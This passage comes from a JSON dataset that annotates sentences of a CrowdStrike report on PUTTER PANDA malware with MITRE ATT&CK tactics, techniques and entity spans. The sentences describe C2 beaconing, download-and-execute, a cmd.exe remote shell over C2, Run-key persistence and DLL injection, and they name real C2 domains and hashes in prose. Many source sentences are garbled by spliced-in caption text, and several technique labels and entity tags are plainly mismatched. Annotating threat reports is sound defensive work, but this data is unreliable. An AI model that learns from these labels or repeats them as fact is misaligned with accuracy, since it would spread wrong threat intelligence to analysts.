{ "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Execute OS commands with stdin/stdout/stderr redirected over the C2 channel.", "entities": [ { "text": "CCommandCMD", "start": 2, "end": 13, "label": "MalwareTool" }, { "text": "C2 channel", "start": 113, "end": 123, "label": "Infrastructure_Indicator" }, { "text": " Execute a command", "start": 15, "end": 33, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s194-77d6c1", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 194, "context_before": "• CCommandCMD – Execute a command, with standard input/output/error Screenshot of Truecaller redirected over the C2 channel.", "sentence_text": "Database Shared by • CCommandNOP – List the current working directory.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "The RAT can list the current working directory through C2 commands.", "entities": [ { "text": "CCommandNOP", "start": 21, "end": 32, "label": "MalwareTool" }, { "text": "List the current working directory", "start": 35, "end": 69, "label": "Action" }, { "text": "Database ", "start": 0, "end": 9, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s195-226a1d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 195, "context_before": "Database Shared by • CCommandNOP – List the current working directory.", "sentence_text": "DEADEYE JACKAL on Their Twitter Account (names redacted)", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "DEADEYE JACKAL utilizes a Twitter account as part of their operational infrastructure.", "entities": [ { "text": "DEADEYE JACKAL", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": " Twitter Account", "start": 23, "end": 39, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s196-6217e3", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 196, "context_before": "DEADEYE JACKAL on Their Twitter Account (names redacted)", "sentence_text": "However, other commands are not implemented in this way.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s197-08f01e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 197, "context_before": "However, other commands are not implemented in this way.", "sentence_text": "These other commands contain functionality to:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s198-9aa1d5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 198, "context_before": "These other commands contain functionality to:\n• Pause C2 activity for a random time interval.", "sentence_text": "• Shutdown C2 activity and exit.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Shutdown C2 activity and terminate the RAT process", "entities": [ { "text": " Shutdown C2 activity", "start": 1, "end": 22, "label": "Action" }, { "text": "exit", "start": 27, "end": 31, "label": "Action" }, { "text": "C2 activity", "start": 11, "end": 22, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p33-s200-8def96", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 33, "sentence_id": 200, "context_before": "•", "sentence_text": "Provide a date and time before which beaconing will not resume, recorded in the file C:\\RECYCLER\\ restore.dat as noted above.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "Beaconing is paused until a specified date and time stored in a file on the system", "entities": [ { "text": "Provide a date and time before which beaconing will not resume", "start": 0, "end": 62, "label": "Action" }, { "text": "C:\\RECYCLER\\ restore.dat ", "start": 85, "end": 110, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s201-e6745d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 201, "context_before": "Provide a date and time before which beaconing will not resume, recorded in the file C:\\RECYCLER\\ restore.dat as noted above.", "sentence_text": "PNGDOWNER – EXAMPLE MD5 HASH 687424F0923DF9049CC3A56C685EB9A5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s202-fdb9d5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 202, "context_before": "PNGDOWNER – EXAMPLE MD5 HASH 687424F0923DF9049CC3A56C685EB9A5", "sentence_text": "The pngdowner malware is a simple tool constructed using Microsoft Visual Studio and implemented via single C++ source code file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s203-46f5ab", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 203, "context_before": "The pngdowner malware is a simple tool constructed using Microsoft Visual Studio and implemented via single C++ source code file.", "sentence_text": "This sample contains a PDB path of Y:\\Visual Studio 2005\\Projects\\branch-downer\\ downer\\Release\\downer.pdb, but other similar paths Z:\\Visual Studio 2005\\Projects\\pngdowner\\Release\\ pngdowner.pdb and Z:\\Visual Studio 2005\\Projects\\downer\\Release\\downer.pdb have also been observed in other samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s205-03c8bc", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 205, "context_before": "Appendix 3 lists metadata for known pngdowner samples.", "sentence_text": "Initially, the malware will perform a connectivity check to a hard-coded URL (http://www.microsoft.com), using a constant user agent Mozilla/4.0 (Compatible; MSIE 6.0;).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "he malware checks connectivity using a hard-coded URL and constant user-agent to verify Internet access before further activity.", "entities": [ { "text": "will perform a connectivity check to ", "start": 23, "end": 60, "label": "Action" }, { "text": "Mozilla/4.0 (Compatible; MSIE 6.0;)", "start": 133, "end": 168, "label": "Infrastructure_Indicator" }, { "text": "(http://www.microsoft.com)", "start": 77, "end": 103, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s206-5255f9", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 206, "context_before": "Initially, the malware will perform a connectivity check to a hard-coded URL (http://www.microsoft.com), using a constant user agent Mozilla/4.0 (Compatible; MSIE 6.0;).", "sentence_text": "An initial request is then made to the hard-coded C2 server and initial URI – forming a URL of the form (in this sample) http://login.stream-media.net/files/xx11/index.asp?95027775, where the numerical parameter represents a random integer.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "The malware sends an initial request to a hard-coded C2 server using a randomized URI parameter.", "entities": [ { "text": "An initial request is then made to", "start": 0, "end": 34, "label": "Action" }, { "text": "hard-coded C2 server", "start": 39, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "http://login.stream-media.net/files/xx11/index.asp?95027775", "start": 121, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "represents a random integer", "start": 212, "end": 239, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s207-da13cd", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 207, "context_before": "An initial request is then made to the hard-coded C2 server and initial URI – forming a URL of the form (in this sample) http://login.stream-media.net/files/xx11/index.asp?95027775, where the numerical parameter represents a random integer.", "sentence_text": "A hard-coded user agent of myAgent is used for this Screenshotrequest, andof Truecallersubsequent Database Shared by communication with the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "A hard-coded user agent string is used for requests to the C2 server.", "entities": [ { "text": " user agent of myAgent is used for this Screenshotrequest", "start": 12, "end": 69, "label": "Action" }, { "text": " the C2 server", "start": 135, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "myAgent", "start": 27, "end": 34, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s208-addf3c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 208, "context_before": "A hard-coded user agent of myAgent is used for this Screenshotrequest, andof Truecallersubsequent Database Shared by communication with the C2 server.", "sentence_text": "DEADEYE JACKAL on Their Twitter Account (names Content returned from this request to the C2 server will be saved to a file named index.dat in the user’s redacted)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s209-18fc0b", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 209, "context_before": "DEADEYE JACKAL on Their Twitter Account (names Content returned from this request to the C2 server will be saved to a file named index.dat in the user’s redacted)\ntemporary directory (i.e., %TEMP%).", "sentence_text": "This file is expected to contain a single line, specifying a URL and a filename.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s210-39e380", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 210, "context_before": "This file is expected to contain a single line, specifying a URL and a filename.", "sentence_text": "The malware will then attempt to download content from the specified URL to the filename within the user’s temporary directory, and then execute this file via the WinExec API.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "The malware downloads a file from a specified URL into the user’s temp directory and executes it via WinExec.", "entities": [ { "text": " attempt to download content from", "start": 21, "end": 54, "label": "Action" }, { "text": "execute this file via the", "start": 137, "end": 162, "label": "Action" }, { "text": "WinExec API", "start": 163, "end": 174, "label": "MalwareTool" }, { "text": "user’s temporary directory,", "start": 100, "end": 127, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s211-d21528", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 211, "context_before": "The malware will then attempt to download content from the specified URL to the filename within the user’s temporary directory, and then execute this file via the WinExec API.", "sentence_text": "If this execution attempt succeeds, a final C2 request will be made – in this case to a URL using the same path as the initial request (and a similarly random parameter), but with a filename of success.asp.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "The malware sends a final C2 request with a success indicator if payload execution completes.", "entities": [ { "text": "If this execution attempt succeeds, a final C2 request will be made", "start": 0, "end": 67, "label": "Infrastructure_Indicator" }, { "text": " URL", "start": 87, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "success.asp", "start": 194, "end": 205, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s212-2dbe43", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 212, "context_before": "If this execution attempt succeeds, a final C2 request will be made – in this case to a URL using the same path as the initial request (and a similarly random parameter), but with a filename of success.asp.", "sentence_text": "Content returned from this request will be saved to a file, but then immediately deleted.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Content from the final C2 request is briefly stored then deleted to avoid leaving evidence.", "entities": [ { "text": "saved to a file, but then immediately deleted", "start": 43, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "Content returned", "start": 0, "end": 16, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s213-1044e8", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 213, "context_before": "Content returned from this request will be saved to a file, but then immediately deleted.", "sentence_text": "The limited functionality, and lack of persistence of this tool, implies that it is used only as a simple download- and-execute utility.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "A simple download-and-execute utility used without persistence.", "entities": [ { "text": "download- and-execute utility", "start": 106, "end": 135, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s214-665446", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 214, "context_before": "The limited functionality, and lack of persistence of this tool, implies that it is used only as a simple download- and-execute utility.", "sentence_text": "Although the version mentioned here uses C++, along with Visual Studios Standard Template Library (STL), older versions of the RAT (such as MD5 hash b54e91c234ec0e739ce429f47a317313), built in 2011, use plain C.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s215-a79494", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 215, "context_before": "Although the version mentioned here uses C++, along with Visual Studios Standard Template Library (STL), older versions of the RAT (such as MD5 hash b54e91c234ec0e739ce429f47a317313), built in 2011, use plain C.", "sentence_text": "This suggests that despite the simple nature of the tool, the developers have made some attempts to modify and perhaps modernize the code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s216-ef4e49", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 216, "context_before": "This suggests that despite the simple nature of the tool, the developers have made some attempts to modify and perhaps modernize the code.", "sentence_text": "Both versions contain debugging/progress messages such as “down file success”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p34-s217-04702c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 34, "sentence_id": 217, "context_before": "Both versions contain debugging/progress messages such as “down file success”.", "sentence_text": "Although these are not displayed to the victim, they were likely used by the developers as a simple means to verify functionality of their code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p35-s219-9d96d7", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 35, "sentence_id": 219, "context_before": "544FCA6EB8181F163E2768C81F2BA0B3\nLike pngdowner, the httpclient malware is a simple tool that provides a limited range of functionality and uses the hard-coded user agent Mozilla/4.0 (Compatible; MSIE 6.0;), although in this variant no attempt is made to extract proxy credentials.", "sentence_text": "The malware will then connect to its configured C2 infrastructure (file.anyoffice.info) and perform a HTTP request of the form shown in Figure 14 below:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Connect to the configured C2 domain and send an HTTP request.", "entities": [ { "text": " C2 infrastructure (file.anyoffice.info)", "start": 47, "end": 87, "label": "Action" }, { "text": "connect to", "start": 22, "end": 32, "label": "Action" }, { "text": "perform a HTTP request of", "start": 92, "end": 117, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p35-s220-d726cb", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 35, "sentence_id": 220, "context_before": "The malware will then connect to its configured C2 infrastructure (file.anyoffice.info) and perform a HTTP request of the form shown in Figure 14 below:", "sentence_text": "Screenshot of Truecaller Sample Beacon DEADEYE JACKAL on Their Twitter Account (names redacted)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p35-s221-250e7e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 35, "sentence_id": 221, "context_before": "Screenshot of Truecaller Sample Beacon DEADEYE JACKAL on Their Twitter Account (names redacted)\nContent returned from the C2 server is deobfuscated by XOR’ing the content with a single byte, 0x12.", "sentence_text": "The decoded data is then checked for the string runshell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p35-s222-8b5291", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 35, "sentence_id": 222, "context_before": "The decoded data is then checked for the string runshell.", "sentence_text": "If this string is not present, the C2 request is repeated every 0.5 seconds.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "If the required control string is missing in the response, the malware repeatedly sends C2 requests every 0.5 seconds.", "entities": [ { "text": " C2 request is repeated", "start": 34, "end": 57, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p35-s223-4a4268", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 35, "sentence_id": 223, "context_before": "If this string is not present, the C2 request is repeated every 0.5 seconds.", "sentence_text": "Otherwise, a shell process is started (i.e., cmd.exe), with input/output redirected over the C2 channel.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Start a remote shell process (cmd.exe) with input/output redirected over the C2 channel.", "entities": [ { "text": "cmd.exe", "start": 45, "end": 52, "label": "MalwareTool" }, { "text": "a shell process is started", "start": 11, "end": 37, "label": "Action" }, { "text": "input/output redirected", "start": 60, "end": 83, "label": "Action" }, { "text": "C2 channel.", "start": 93, "end": 104, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p35-s224-c291d2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 35, "sentence_id": 224, "context_before": "Otherwise, a shell process is started (i.e., cmd.exe), with input/output redirected over the C2 channel.", "sentence_text": "Shell commands from the server are followed by an encoded string $$$, which indicates that the shell session should continue.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "shell commands from the server are followed by an encoded string indicating session continuation", "entities": [ { "text": "the server", "start": 20, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "Shell commands from the server are followed by an encoded string $$$", "start": 0, "end": 68, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p35-s225-7b76dc", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 35, "sentence_id": 225, "context_before": "Shell commands from the server are followed by an encoded string $$$, which indicates that the shell session should continue.", "sentence_text": "If the session is ended, two other commands are supported: m2b (upload file) and b2m (download file).", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "If the shell session ends, the malware supports file upload (m2b) and download (b2m) commands.", "entities": [ { "text": "upload file", "start": 64, "end": 75, "label": "Action" }, { "text": "download file", "start": 86, "end": 99, "label": "Action" }, { "text": "m2b", "start": 59, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "b2m", "start": 81, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "the session is ended", "start": 3, "end": 23, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p35-s226-95cb71", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 35, "sentence_id": 226, "context_before": "If the session is ended, two other commands are supported: m2b (upload file) and b2m (download file).", "sentence_text": "Slight variations on the C2 URLs are used for different phases of the C2 interaction:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "the malware uses different C2 URLs depending on the communication phase", "entities": [ { "text": "C2 URLs", "start": 25, "end": 32, "label": "Infrastructure_Indicator" }, { "text": " are used for different phases ", "start": 32, "end": 63, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s227-c7120c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 227, "context_before": "Slight variations on the C2 URLs are used for different phases of the C2 interaction:\n• Shell command: /Microsoft/errorpost/default.asp?tmp= • Shell response: /MicrosoftUpdate/GetUpdate/KB/default.asp?tmp= 15Both methods are detailed here: http://securityxploded.com/iepasswordsecrets.php", "sentence_text": "Given the lack of a persistence mechanism and low level of sophistication, it is likely that httpclient – like pngdowner – is used as a second-stage or supplementary/backup tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s229-85b7ad", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 229, "context_before": "Appendix 4 lists metadata for observed httpclient samples.", "sentence_text": "DROPPERS – RC4 AND XOR BASED Other CrowdStrike reporting describes a dropper used by PUTTER PANDA (abc.scr) to install the 4H RAT.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "PUTTER PANDA uses a dropper (abc.scr) to install the 4H RAT.", "entities": [ { "text": "PUTTER PANDA", "start": 85, "end": 97, "label": "ThreatActor" }, { "text": "abc.scr", "start": 99, "end": 106, "label": "MalwareTool" }, { "text": "4H RAT", "start": 123, "end": 129, "label": "MalwareTool" }, { "text": " dropper used", "start": 68, "end": 81, "label": "Action" }, { "text": "to install", "start": 108, "end": 118, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s230-647ee3", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 230, "context_before": "DROPPERS – RC4 AND XOR BASED Other CrowdStrike reporting describes a dropper used by PUTTER PANDA (abc.scr) to install the 4H RAT.", "sentence_text": "This dropper uses RC4 to decrypt an embedded payload from data in an embedded resource before writing the payload to disk and executing it.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.001", "name": "Binary Padding" } ], "procedure": "Decrypt embedded payload using RC4, write it to disk, and execute it", "entities": [ { "text": "uses RC4 to decrypt an", "start": 13, "end": 35, "label": "Action" }, { "text": "writing the payload to", "start": 94, "end": 116, "label": "Action" }, { "text": "executing it", "start": 126, "end": 138, "label": "Action" }, { "text": "embedded resource", "start": 69, "end": 86, "label": "Infrastructure_Indicator" }, { "text": " dropper", "start": 4, "end": 12, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s231-ea807b", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 231, "context_before": "This dropper uses RC4 to decrypt an embedded payload from data in an embedded resource before writing the payload to disk and executing it.", "sentence_text": "Another dropper has been observed, exclusively installing the pngdowner malware (example MD5 hash 4c50457c35e2033b3a03fcbb4adac7b7).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Installs the pngdowner malware.", "entities": [ { "text": "observed, exclusively installing the", "start": 25, "end": 61, "label": "Action" }, { "text": "pngdowner malware", "start": 62, "end": 79, "label": "MalwareTool" }, { "text": " 4c50457c35e2033b3a03fcbb4adac7b7", "start": 97, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s232-56de6a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 232, "context_before": "Another dropper has been observed, exclusively installing the pngdowner malware (example MD5 hash 4c50457c35e2033b3a03fcbb4adac7b7).", "sentence_text": "This dropper is simplistic in nature, and is compiled from a single C++ source code file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s233-fb18a1", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 233, "context_before": "This dropper is simplistic in nature, and is compiled from a single C++ source code file.", "sentence_text": "It contains a Word document in plaintext (written to Bienvenue_a_Sahaja_Yoga_Toulouse.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s234-80b1ae", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 234, "context_before": "It contains a Word document in plaintext (written to Bienvenue_a_Sahaja_Yoga_Toulouse.\ndoc), along with an executable (Update.exe) and DLL (McUpdate.dll).", "sentence_text": "The executable and DLL are both contained within the .data section of the dropper, obfuscated with a 16-byte XOR key (consisting of the bytes 0xA0 – 0xAF).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The dropper stores an executable and DLL inside its .data section and obfuscates them with a 16-byte XOR key.", "entities": [ { "text": "obfuscated with", "start": 83, "end": 98, "label": "Action" }, { "text": "dropper", "start": 74, "end": 81, "label": "MalwareTool" }, { "text": " .data section", "start": 52, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "consisting of the bytes 0xA0 – 0xAF", "start": 118, "end": 153, "label": "Infrastructure_Indicator" }, { "text": "The executable and DLL", "start": 0, "end": 22, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s235-c73709", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 235, "context_before": "The executable and DLL are both contained within the .data section of the dropper, obfuscated with a 16-byte XOR key (consisting of the bytes 0xA0 – 0xAF).", "sentence_text": "Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Both the document and executable are written to disk and the executed via the ShellExecute API (using the Twitter Account (names verb “open”).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "The malware writes both the document and executable to disk and executes them via ShellExecute.", "entities": [ { "text": "are written to disk and the executed", "start": 101, "end": 137, "label": "Action" }, { "text": "ShellExecute API", "start": 146, "end": 162, "label": "MalwareTool" }, { "text": "Truecaller Database", "start": 14, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "Twitter Account", "start": 174, "end": 189, "label": "Infrastructure_Indicator" }, { "text": " DEADEYE JACKAL", "start": 43, "end": 58, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s236-477b81", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 236, "context_before": "Screenshot of Truecaller Database Shared by DEADEYE JACKAL on Their Both the document and executable are written to disk and the executed via the ShellExecute API (using the Twitter Account (names verb “open”).", "sentence_text": "The executable is also installed into the ASEP registry key HKCU\\Software\\Microsoft\\Windows\\ redacted)", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "The malware installs its executable into an ASEP registry key to maintain persistence", "entities": [ { "text": "ASEP registry key HKCU\\Software\\Microsoft\\Windows\\ redacted", "start": 42, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "is also installed into", "start": 15, "end": 37, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s237-4df86d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 237, "context_before": "The executable is also installed into the ASEP registry key HKCU\\Software\\Microsoft\\Windows\\ redacted)", "sentence_text": "CurrentVersion\\Run, with a value named McUpdate.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "The malware sets a persistence value named McUpdate in the CurrentVersion\\Run registry path.", "entities": [ { "text": "CurrentVersion\\Run", "start": 0, "end": 18, "label": "Infrastructure_Indicator" }, { "text": " named", "start": 32, "end": 38, "label": "Action" }, { "text": "McUpdate", "start": 39, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s238-cbda14", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 238, "context_before": "CurrentVersion\\Run, with a value named McUpdate.", "sentence_text": "Finally, the dropper deletes itself via a batch file.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "The dropper deletes itself using a batch file to remove evidence.", "entities": [ { "text": " deletes itself", "start": 20, "end": 35, "label": "Action" }, { "text": " batch file.", "start": 41, "end": 53, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p36-s239-3af57a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 36, "sentence_id": 239, "context_before": "Finally, the dropper deletes itself via a batch file.", "sentence_text": "The dropped executable (MD5 hash 38a2a6782e1af29ca8cb691cf0d29a0d) primarily aims to inject the specified DLL (McUpdate.dll, MD5 hash 08c7b5501df060ccfc3aa5c8c41b452f) into a process that would normally be accessing the network, likely in order to disguise the malicious activity.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Inject the McUpdate.dll payload into a network-accessible process to disguise malicious activity.", "entities": [ { "text": " dropped executable", "start": 3, "end": 22, "label": "MalwareTool" }, { "text": "38a2a6782e1af29ca8cb691cf0d29a0d", "start": 33, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "McUpdate.dll", "start": 111, "end": 123, "label": "MalwareTool" }, { "text": " to inject", "start": 81, "end": 91, "label": "Action" }, { "text": "disguise the malicious activity", "start": 248, "end": 279, "label": "Action" }, { "text": "a process that would normally be accessing the network", "start": 173, "end": 227, 